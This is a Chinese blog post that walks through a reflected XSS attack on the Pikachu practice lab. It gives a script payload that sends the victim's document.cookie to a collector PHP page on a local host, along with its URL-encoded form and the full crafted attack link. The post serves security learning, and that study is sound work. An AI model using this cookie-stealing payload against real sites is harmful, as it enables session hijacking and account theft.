用了那么多平台,今天想自己研究一下攻击过程
话不多说,先上受害者
显然这里可能存在XSS
用弹窗试了一下,果不其然
自己写了两行代码,实现获取URL里面的cookie参数,然后将cookie写入一个新的文件cookie.txt中
然后构造payload <script> document.location='http://192.168.2.91/XSSCOOKIE/getcookie.php?cookie='+document.cookie</script>
document.cookie负责获取当前同源的cookie
document.location负责读取(访问)写好的文件,并携带上cookie参数
这里message携带的参数需要进行一次URL编码:#%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E
所以最后的成品链接就是这样:
http://192.168.2.91/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E%20document.location%3D%27http%3A%2F%2F192.168.2.91%2FXSSCOOKIE%2Fgetcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3C%2Fscript%3E&submit=submit
最后访问了链接之后,活生生的cookie就已经写好在cookie.txt中了。
本文来自博客园,作者:domb,转载请注明原文链接:https://www.cnblogs.com/domb2235/p/16204789.html
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)